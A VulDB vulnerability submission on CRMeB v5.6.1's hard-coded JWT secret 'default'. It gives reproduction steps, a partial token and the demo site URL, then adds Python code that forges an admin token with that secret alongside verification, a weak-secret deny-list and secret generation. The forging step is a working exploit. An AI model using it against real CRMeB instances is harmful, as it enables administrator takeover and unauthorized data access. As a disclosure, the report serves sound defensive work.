Submission #659843: CRMeB v5.6.1 Use of hard-coded / weak cryptographic key (CWE-321 / CWE-798) — Information

Title: CRMeB v5.6.1 Use of hard-coded / weak cryptographic key (CWE-321 / CWE-798) —
الوصفCRMeB ships with a weak, predictable default JWT HMAC secret value set to "default". The official demo instance (v5.crmeb.net) and fresh deployments use the same default secret. Because the HMAC secret is known/predictable, an attacker can sign arbitrary HS256 JWTs that the server will accept. This allows forging tokens that impersonate any user (including administrators), resulting in authentication bypass, privilege escalation (administrator takeover), and unauthorized access to protected APIs and sensitive business data. Reproduction (concise) 1. Obtain a JWT issued by the CRMeB demo or deploy a fresh CRMeB instance. 2. Confirm iss claim (e.g., v5.crmeb.net) in the token payload. 3. Use the known secret "default" to sign an HS256 JWT with elevated claims (for example, {"jti":{"id":5,"type":"admin"}}). 4. Send the forged token in Authorization: Bearer <forged_jwt> to protected/admin endpoints — the server accepts the token and grants access. Evidence • Observed JWT from demo: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9....V3jebfZZJPpfLBT0TTu53rxSZfaNB4U-zusdikcJSFk (full token available). • Recovered HMAC secret: default. • iss claim points to v5.crmeb.net, confirming demo origin. Impact • Authentication bypass (any account impersonation) • Privilege escalation / administrator takeover • Unauthorized access and potential data exfiltration Suggested remediation (short) • Remove hard-coded/weak default secrets. Generate a strong random JWT secret at install time and require administrators to set/rotate it. • Invalidate tokens signed with the default secret and add documentation/warnings about secret management. Official demonstration website address: https://v5.crmeb.net/admin/login?redirect=%2Fadmin%2Findex
User: BlackSpdier (UID 89912)
Submitted: 22/09/2025 11:01 AM (7 months ago)
Moderation: 04/10/2025 08:31 PM (12 days later)
Status: Approved
VulDB Entry: 327171 [CRMEB up to 5.6.1 JWT HMAC Secret weak encryption]
Points: 17
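The forging step from the reproduction and the remediation check, as an added example in Python using only the standard library. This is not code from the report or from CRMeB. The claim layout is the one the report gives in step 3 and the iss value is the one it observed; which claims the real server actually checks, and how it handles expiry, are not on the page and are assumed away here. The deny-list of weak secrets is constructed for illustration.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

# Claim layout copied from the report's step 3; the issuer is the value the
# report observed on the demo instance. The real server may check more claims.
REPORTED_SECRET = "default"
ADMIN_CLAIMS = {"jti": {"id": 5, "type": "admin"}, "iss": "v5.crmeb.net"}

# Constructed deny-list for illustration; a deployment check would be stricter.
KNOWN_WEAK_SECRETS = {"", "default", "secret", "changeme", "123456"}


def b64url_encode(raw: bytes) -> str:
    """Base64url without '=' padding, as JWS (RFC 7515) requires."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url_encode; re-adds the padding that JWS strips."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: str) -> str:
    """Mint a compact HS256 JWS over `payload`. With the secret known, this is
    exactly the forging step: the server cannot tell it from its own tokens."""
    header = {"typ": "JWT", "alg": "HS256"}
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(mac)}"


def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Return the claims if `token` is a valid HS256 JWS under `secret`, else None.
    The algorithm is pinned server-side instead of being trusted from the header,
    and the MAC is compared in constant time."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        signature = b64url_decode(sig_b64)
    except ValueError:  # wrong segment count, bad base64, or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(
        secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256
    ).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    return json.loads(b64url_decode(payload_b64))


def forge_admin_token(secret: str = REPORTED_SECRET) -> str:
    """Step 3 of the reproduction: sign elevated claims with the default secret."""
    return sign_hs256(ADMIN_CLAIMS, secret)


def secret_is_acceptable(secret: str) -> bool:
    """Remediation check: refuse known defaults and anything shorter than 32
    bytes (RFC 7518 section 3.2 requires HS256 keys of at least 256 bits).
    The length check is a crude floor on the encoded bytes, not on entropy."""
    return secret not in KNOWN_WEAK_SECRETS and len(secret.encode()) >= 32


def generate_jwt_secret() -> str:
    """What an installer should do instead: 32 random bytes, hex-encoded."""
    return secrets.token_hex(32)


if __name__ == "__main__":
    forged = forge_admin_token()
    print("forged token:", forged)
    print("accepted under 'default':", verify_hs256(forged, REPORTED_SECRET))
    rotated = generate_jwt_secret()
    print("accepted after rotation:", verify_hs256(forged, rotated))
    print("'default' passes the secret check:", secret_is_acceptable(REPORTED_SECRET))
```

Running it shows the forged token verifying under "default" and being rejected once the secret is rotated, which is the whole of the remediation: the fix is not in the verifier but in never letting the default value reach production, and rotating it invalidates every token signed with it.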
